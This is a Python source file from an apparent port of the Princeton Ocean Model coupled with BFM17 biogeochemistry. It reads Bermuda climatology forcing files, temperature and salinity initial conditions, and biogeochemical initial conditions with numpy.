-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n# MODEL POM - Princeton Ocean Model\n# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\nimport numpy as np\nfrom os import path\nfrom cppdefs import *\nfrom inputs import params_POMBFM\nfrom inputs.namelist_input_data import phyto_input, zoop_input, poc_input, doc_input, phos_input, nit_input, am_input, oxy_input\nfrom pom.constants import current_path, seconds_per_day, vertical_layers\n\n# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n#\n# SUBROUTINE: read_pom_input\n#\n# DESCRIPTION: Opens forcing files reading path specified in pom_input nml.\n# (formerly opendat)\n#\n# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\ndef read_pom_input():\n\n \"\"\"\n Description: Opens forcing files reading the paths specified in the pom_input namelist.\n\n :return: data arrays for wind stress, surface salinity, solar radiation, inorganic\n suspended matter, salinity and temperature vertical profiles, general circulation\n for w velocity, intermediate eddy velocities, salinity and temperature initial\n conditions, heat flux loss, and surface and bottom nutrients\n \"\"\"\n\n # PATHS TO INPUT DATA FILES\n wind_stress_data_path = current_path + '/inputs/POM_BFM17/monthly_surf_wind_stress_bermuda_killworth2.da'\n surface_salinity_data_path = current_path + '/inputs/POM_BFM17/monthly_surf_salt_bermuda_150m_killworth2.da'\n shortwave_solar_radiation_data_path = current_path + '/inputs/POM_BFM17/monthly_surf_qs_bermuda_killworth2.da'\n inorganic_suspended_matter_data_path = current_path + '/inputs/POM_BFM17/monthly_clima_ISM_150m_bermuda_killworth.da'\n salinity_vertical_profile_data_path = current_path + '/inputs/POM_BFM17/monthly_clima_salt_150m_bermuda_killworth2.da'\n temperature_vertical_profile_data_path = current_path + '/inputs/POM_BFM17/monthly_clima_temp_150m_bermuda_killworth2.da'\n general_circulation_w_velocity_data_path = current_path + '/inputs/POM_BFM17/monthly_clima_w_150m_bermuda_ekman.da'\n intermediate_eddy_w_velocity_1_data_path = current_path + '/inputs/POM_BFM17/bimonthly_random_eddy_w_150m_bermuda_norm1.da'\n intermediate_eddy_w_velocity_2_data_path = current_path + '/inputs/POM_BFM17/bimonthly_random_eddy_w_150m_bermuda_norm2.da'\n salinity_initial_conditions_data_path = current_path + '/inputs/POM_BFM17/init_prof_S_150m_bermuda_killworth2.da'\n temperature_initial_conditions_data_path = current_path + '/inputs/POM_BFM17/init_prof_T_150m_bermuda_killworth2.da'\n heat_flux_loss_data_path = current_path + '/inputs/POM_BFM17/monthly_surf_rad_bermuda_killworth2.da'\n surface_nutrients_data_path = current_path + '/inputs/POM_BFM17/NutrientsARPAOGS.da'\n bottom_nutrients_data_path = current_path + '/inputs/POM_BFM17/monthly_bott_nut_bermuda_150m_killworth.da'\n\n # LENGTH OF INPUT ARRAYS\n array_length = 13 # MONTHS (D-J-F-M-A-M-J-J-A-S-O-N-D)\n\n # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n # WIND SPEED (u,v)\n # 
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n if path.exists(wind_stress_data_path):\n wind_speed_data = np.fromfile(wind_stress_data_path)\n wind_speed_zonal = np.zeros(array_length)\n wind_speed_meridional = np.zeros(array_length)\n for i in range(0,array_length):\n wind_speed_zonal[i] = wind_speed_data[2*i + 0]\n wind_speed_meridional[i] = wind_speed_data[2*i + 1]\n\n # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n # SURFACE SALINITY\n # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n if path.exists(surface_salinity_data_path):\n surface_salinity = np.fromfile(surface_salinity_data_path)\n\n # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n # RADIANCE\n # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n if path.exists(shortwave_solar_radiation_data_path):\n solar_radiation = np.fromfile(shortwave_solar_radiation_data_path)\n\n # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n # INORGANIC SUSPENDED MATTER\n # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n if path.exists(inorganic_suspended_matter_data_path):\n inorganic_suspended_matter_data = np.fromfile(inorganic_suspended_matter_data_path)\n inorganic_suspended_matter = np.zeros((vertical_layers,array_length))\n for i in range(0,array_length):\n for x in range(0, vertical_layers):\n inorganic_suspended_matter[x,i] = inorganic_suspended_matter_data[vertical_layers * i + x]\n\n # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n # SALINITY CLIMATOLOGY (DIAGNOSTIC MODE)\n # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n if path.exists(salinity_vertical_profile_data_path):\n salinity_vertical_profile_data = np.fromfile(salinity_vertical_profile_data_path)\n salinity_climatology = np.zeros((vertical_layers,array_length))\n for i in range(0,array_length):\n for x in range(0, vertical_layers):\n salinity_climatology[x,i] = salinity_vertical_profile_data[vertical_layers * i + x]\n\n # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n # TEMPERATURE CLIMATOLOGY (DIAGNOSTIC MODE)\n # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n if path.exists(temperature_vertical_profile_data_path):\n temperature_vertical_profile_data = np.fromfile(temperature_vertical_profile_data_path)\n temperature_climatology = np.zeros((vertical_layers,array_length))\n for i in range(0,array_length):\n for x in range(0, vertical_layers):\n temperature_climatology[x,i] = temperature_vertical_profile_data[vertical_layers * i + x]\n\n # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n # GENERAL CIRCULATION W VELOITY CLIMATOLOGY\n # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n if path.exists(general_circulation_w_velocity_data_path):\n general_circulation_w_velocity_data = 
np.fromfile(general_circulation_w_velocity_data_path)\n w_velocity_climatology = np.zeros((vertical_layers,array_length))\n for i in range(0,array_length):\n for x in range(0, vertical_layers):\n w_velocity_climatology[x,i] = general_circulation_w_velocity_data[vertical_layers * i + x]\n\n # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n # INTERMITTANT EDDY W VELOCITY 1\n # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n if path.exists(intermediate_eddy_w_velocity_1_data_path):\n intermediate_eddy_w_velocity_1_data = np.fromfile(intermediate_eddy_w_velocity_1_data_path)\n w_eddy_velocity_1 = np.zeros((vertical_layers,array_length))\n for i in range(0,array_length):\n for x in range(0, vertical_layers):\n w_eddy_velocity_1[x,i] = intermediate_eddy_w_velocity_1_data[vertical_layers * i + x]\n\n # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n # INTERMITTANT EDDY W VELOCITY 2\n # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n if path.exists(intermediate_eddy_w_velocity_2_data_path):\n intermediate_eddy_w_velocity_2_data = np.fromfile(intermediate_eddy_w_velocity_2_data_path)\n w_eddy_velocity_2 = np.zeros((vertical_layers,array_length))\n for i in range(0,array_length):\n for x in range(0, vertical_layers):\n w_eddy_velocity_2[x,i] = intermediate_eddy_w_velocity_2_data[vertical_layers * i + x]\n\n # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n # SALINITY INITIAL PROFILE\n # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n if path.exists(salinity_initial_conditions_data_path):\n salinity_backward = np.fromfile(salinity_initial_conditions_data_path)\n\n # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n # TEMPERATURE INITIAL PROFILE\n # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n if path.exists(temperature_initial_conditions_data_path):\n temperature_backward = np.fromfile(temperature_initial_conditions_data_path)\n\n # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n # HEAT FLUX\n # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n if path.exists(heat_flux_loss_data_path):\n heat_flux_loss_data = np.fromfile(heat_flux_loss_data_path)\n shortwave_radiation = np.zeros(array_length)\n surface_heat_flux = np.zeros(array_length)\n kinetic_energy_loss = np.zeros(array_length)\n for i in range(0,array_length):\n shortwave_radiation[i] = heat_flux_loss_data[3*i + 0]\n surface_heat_flux[i] = heat_flux_loss_data[3*i + 1]\n kinetic_energy_loss[i] = heat_flux_loss_data[3*i + 2]\n\n # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n # SURFACE NUTRIENTS\n # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n if path.exists(surface_nutrients_data_path):\n surface_nutrients_data = np.fromfile(surface_nutrients_data_path)\n NO3_s1 = np.zeros(array_length)\n NH4_s1 = np.zeros(array_length)\n PO4_s1 
= np.zeros(array_length)\n SIO4_s1 = np.zeros(array_length)\n for i in range(0,array_length):\n NO3_s1[i] = surface_nutrients_data[4*i + 0]\n NH4_s1[i] = surface_nutrients_data[4*i + 1]\n PO4_s1[i] = surface_nutrients_data[4*i + 2]\n SIO4_s1[i] = surface_nutrients_data[4*i + 3]\n\n # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n # BOTTOM NUTRIENTS\n # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n if path.exists(bottom_nutrients_data_path):\n bottom_nutrients_data = np.fromfile(bottom_nutrients_data_path)\n O2_b1 = np.zeros(array_length)\n NO3_b1 = np.zeros(array_length)\n PO4_b1 = np.zeros(array_length)\n PON_b1 = np.zeros(array_length)\n for i in range(0,array_length):\n O2_b1[i] = bottom_nutrients_data[4*i + 0]\n NO3_b1[i] = bottom_nutrients_data[4*i + 1]\n PO4_b1[i] = bottom_nutrients_data[4*i + 2]\n PON_b1[i] = bottom_nutrients_data[4*i + 3]\n\n return wind_speed_zonal, wind_speed_meridional, surface_salinity, solar_radiation, inorganic_suspended_matter, \\\n salinity_climatology, temperature_climatology, w_velocity_climatology, w_eddy_velocity_1, \\\n w_eddy_velocity_2, salinity_backward, temperature_backward, \\\n shortwave_radiation, surface_heat_flux, kinetic_energy_loss, \\\n NO3_s1, NH4_s1, PO4_s1, SIO4_s1, O2_b1, NO3_b1, PO4_b1, PON_b1\n\n\n# wind_speed_zonal, wind_speed_meridional, surface_salinity, solar_radiation, inorganic_suspended_matter, \\\n# salinity_climatology, temperature_climatology, w_velocity_climatology, w_eddy_velocity_1, \\\n# w_eddy_velocity_2, salinity_initial_profile, temperature_initial_profile, \\\n# surface_solar_radiation, surface_heat_flux_loss, kinetic_energy_loss, \\\n# NO3_s1, NH4_s1, PO4_s1, SIO4_s1, O2_b1, NO3_b1, PO4_b1, PON_b1 = read_pom_input()\n\n\n\n\n# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n#\n# SUBROUTINE: get_TS_IC\n#\n# DESCRIPTION: This subroutine opens and reads files containing the T&S initial conditions\n# Files are read in direct access mode reading path specified in pom_input nml\n#\n# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n\n\ndef get_temperature_and_salinity_initial_coditions():\n\n \"\"\"\n Description: Opens and reads files containing the initial conditions for temperature\n and salinity. 
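(Editorial note, not in the original: each read below is guarded by\n path.exists, so a missing file leaves the corresponding profile unbound.)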
Files are read from the pom_input namelist.\n\n :return: temperature and salinity at the current and backward time level\n \"\"\"\n\n salinity_initial_conditions_data_path = current_path + '/inputs/POM_BFM17/init_prof_S_150m_bermuda_killworth2.da'\n temperature_initial_conditions_data_path = current_path + '/inputs/POM_BFM17/init_prof_T_150m_bermuda_killworth2.da'\n\n # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n # SALINITY INITIAL PROFILE\n # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n if path.exists(salinity_initial_conditions_data_path):\n salinity_backward = np.fromfile(salinity_initial_conditions_data_path)\n\n # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n # TEMPERATURE INITIAL PROFILE\n # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n if path.exists(temperature_initial_conditions_data_path):\n temperature_backward = np.fromfile(temperature_initial_conditions_data_path)\n\n temperature = np.zeros(vertical_layers)\n salinity = np.zeros(vertical_layers)\n\n temperature[:] = temperature_backward[:]\n salinity[:] = salinity_backward[:]\n\n return temperature, temperature_backward, \\\n salinity, salinity_backward\n\n\n# temperature_current_time_level, temperature_backwards_time_level, \\\n# salinity_current_time_level, salinity_backwards_time_level = get_temperature_and_salinity_initial_coditions()\n\n\n# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n#\n# ROUTINE: GetDelta\n#\n# DESCRIPTION: Get the numeric timestep\n# Transfer the integration time step to the BFM Unit conversion\n# from seconds to days\n#\n# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n\ndef get_numeric_timestep():\n\n \"\"\"\n Description: Get the numeric timestep. 
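(For example, assuming seconds_per_day = 86400, dti = 100 s maps to\n 100 / 86400, i.e. about 0.0011574 days.)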
Transfer the integration timestep to the BFM\n Unit conversion from seconds to days.\n\n :return: numeric timestep\n \"\"\"\n\n numeric_timestep = params_POMBFM.dti / seconds_per_day\n\n return numeric_timestep\n\n\n# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n#\n# ROUTINE: Service\n#\n# DESCRIPTION: This routine passes the physical variables to the BFM\n#\n# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n\n# def pom_to_bfm():\n\n# \"\"\"\n# Description: Passes the physical variables to the BFM\n\n# :return: seawater density, temperature and salinity, suspended sediment load,\n# photosynthetically available radiation, gridpoint depth, and wind speed\n# \"\"\"\n\n# # try:\n# # import NOPOINTERS\n# # NOPOINTERS = True\n# # except FileNotFoundError:\n# # NOPOINTERS = False\n# # if NOPOINTERS:\n# # from modules import ETW, ESW, EIR, ESS, ERHO, EWIND, Depth\n\n# from modules_old import vertical_layers, water_specific_heat_times_density, temperature_backward, \\\n# salinity_backward, density_profile, bottom_depth, vertical_spacing, shortwave_radiation, wind_stress_zonal, \\\n# wind_stress_meridional, diffusion_coefficient_momentum, diffusion_coefficient_tracers, \\\n# velocity_zonal, velocity_meridional, kinetic_energy, \\\n# kinetic_energy_times_length, length_scale\n\n# from modules_old import inorganic_suspended_matter, interpolated_w_velocity, w_eddy_velocity\n\n# # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n# # 1D ARRAYS FOR BFM\n# # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n\n# ETW = np.zeros(vertical_layers - 1)\n# ESW = np.zeros(vertical_layers - 1)\n# ESS = np.zeros(vertical_layers - 1)\n# ERHO = np.zeros(vertical_layers - 1)\n# Depth = np.zeros(vertical_layers - 1)\n# EIR = np.zeros(vertical_layers - 1)\n\n# for i in range(0,vertical_layers - 1):\n# ETW[i] = temperature_backward[i]\n# ESW[i] = salinity_backward[i]\n# ERHO[i] = (density_profile[i] * 1.E3) + 1.E3\n# ESS[i] = inorganic_suspended_matter[i]\n# Depth[i] = vertical_spacing[i] * params_POMBFM.h\n\n# EIR[0] = -1. 
* shortwave_radiation * water_specific_heat_times_density\n\n# wind_stress = np.sqrt(wind_stress_zonal**2 + wind_stress_meridional**2) * 1.E3\n# EWIND = np.sqrt(wind_stress/(1.25 * 0.0014))\n\n# return ETW, ESW, EIR, \\\n# ESS, ERHO, EWIND\n\n\n# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n# MODEL POM - Princeton Ocean Model\n# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n#\n# # ROUTINE: get_IC\n#\n# DESCRIPTION\n#\n# This subroutine opens and read files containing the initial conditions\n# for p2c, z4c, r1c, r6c, n1p, n3n, n4n, and o2o\n# Files are read in direct access mode reading path\n# specified in bfm_IC_input nml\n#\n# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n\ndef get_initial_conditions():\n\n \"\"\"\n Desription: Opens and reads data files containing the initial conditions for p2c, z4c,\n r1c, r6c, n1p, n3n, n4n, and o2o\n\n :return: initial conditions for phytoplankton carbon, zooplankton carbon, particulate\n organic carbon, dissolved organic carbon, phosphate, nitrate, ammonium,\n and oxygen\n \"\"\"\n\n phytoplankton_carbon_data_path = current_path + phyto_input\n zooplankton_carbon_data_path = current_path + zoop_input\n particulate_organic_carbon_data_path = current_path + poc_input\n dissolved_organic_carbon_data_path = current_path + doc_input\n phosphate_data_path = current_path + phos_input\n nitrate_data_path = current_path + nit_input\n ammonium_data_path = current_path + am_input\n oxygen_data_path = current_path + oxy_input\n\n if path.exists(phytoplankton_carbon_data_path):\n p2c = np.fromfile(phytoplankton_carbon_data_path)\n\n if path.exists(zooplankton_carbon_data_path):\n z5c = np.fromfile(zooplankton_carbon_data_path)\n\n if path.exists(particulate_organic_carbon_data_path):\n r6c = np.fromfile(particulate_organic_carbon_data_path)\n\n if path.exists(dissolved_organic_carbon_data_path):\n r1c = np.fromfile(dissolved_organic_carbon_data_path)\n\n if path.exists(phosphate_data_path):\n n1p = np.fromfile(phosphate_data_path)\n\n if path.exists(nitrate_data_path):\n n3n = np.fromfile(nitrate_data_path)\n\n if path.exists(ammonium_data_path):\n n4n = np.fromfile(ammonium_data_path)\n\n if path.exists(oxygen_data_path):\n o2o = np.fromfile(oxygen_data_path)\n\n return p2c, z5c, r6c, r1c, n1p, n3n, n4n, o2o\n\n# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n# MODEL POM - Princeton Ocean Model\n# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n#\n# # ROUTINE: set_initial_conditions\n#\n# DESCRIPTION\n#\n# This routine assigns initial conditioons of biochemical variables in POM\n#\n# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n\n# def set_initial_conditions():\n#\n# \"\"\"\n# Description: Assigns initial conditions of biochemical variables in POM\n#\n# :return:\n# \"\"\"\n#\n# from modules_old import vertical_layers\n# from modules_old import zero, NML_OPEN, NML_READ, NMLUNIT, error_msg_prn\n# # from modules import photosynthetic_radiation\n#\n# p_nRc = 0.0126\n# p_pRc = 0.7862E-03\n# p_sRc = 0.0118\n# p_iRc = 1./25.\n#\n# try:\n# import INCLUDE_BEN\n# INCLUDE_BEN = True\n# except FileNotFoundError:\n# INCLUDE_BEN = False\n# 
if INCLUDE_BEN:\n# from inputs.namelist_input_data import y1c0, y2c0, y3c0, y4c0, y5c0, h1c0, h2c0, \\\n# k1p0, k11p0, k21p0, k4n0, k14n0, k24n0, k3n0, k5s0, k6r0, d1m0, d2m0, d6m0, d7m0, d8m0, d9m0, \\\n# q6c0, q6n0, q6p0, q6s0, q1c0, q11c0, g2o0, g3c0, g13c0, g23c0, g3h0, g13h0, g23h0\n#\n# # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n# # DEFINITION OF BIOGEOCHEMICAL GLOBAL VARIABLES\n# # IrrOPT in the equation of Steele and light\n# # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n# photosynthetic_radiation = np.zeros(vertical_layers,dtype=float)\n#\n# # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n# # DEFINITION OF 